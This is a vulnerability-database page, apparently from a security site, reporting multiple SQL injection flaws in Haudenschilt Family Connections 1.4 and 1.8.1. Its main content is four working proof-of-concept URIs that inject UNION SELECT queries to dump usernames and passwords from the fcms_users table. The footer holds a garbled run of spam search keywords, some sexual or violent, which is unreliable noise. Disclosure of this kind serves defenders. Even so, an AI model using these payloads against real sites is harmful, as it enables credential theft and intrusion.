about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Haudenschilt Family Connections Multiple SQL Injection Vulnerabilities


Title Haudenschilt Family Connections Multiple SQL Injection Vulnerabilities
Published 2008-06-14-12:00AM
Updated 2009-03-30-07:26PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  CWH Underground
Vulnerable  Haudenschilt Family Connections 1.8.1
Haudenschilt Family Connections 1.4
Not Vulnerable  
Code  An attacker can exploit these issues via a browser.The following proof-of-concept URIs are available:http://www.example.com/fcms/addressbook.php?address=1/**/UNION/**/SELECT/**/1,2,password,username,5,6,7,8,9,10,11,12,13,14,15,16/**/FROM/**/fcms_users
http://www.example.com/fcms/familynews.php?getnews=-9999/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,concat(username,0x3a,password),11,12,13,14,15,16,17,18,19/**/FROM/**/fcms_users&newsid=2
http://www.example.com/fcms/home.php?action=results&poll_id=-9999/**/UNION/**/SELECT/**/1,concat(username,0x3a,password),3,4,5/**/FROM/**/fcms_users--
http://www.example.com/path/home.php?poll_id=-1 UNION ALL SELECT 1,NULL,3,CONCAT(username, 0x3a, password) FROM fcms_users%23
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Fri, 18 Dec 2009 21:05:19 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
njzhaoshen pro rat do man behead Kushpu nud 792103 indian ido Srilankase www.6688wz Delhicallg CMS is Fre livestats fuck free enumeratio param linqingcf. WWW.TRISHA sex only zeroboard. sak www.yzmoth persiankit lo253l xtramail DOCSIS shv5 www.wangsh gayview XxxPk php-nuke 2 2.6.9 loca Simple Mac foxes /search/ex aenimalsse Php nuke 7 Version C\r\n2199\ sexy php 6 sexfreevid www.youtou vdj narutosex Apache/2.0 kec php-nuke 2 Video du s aticle xp sp2 exp kernel 2.6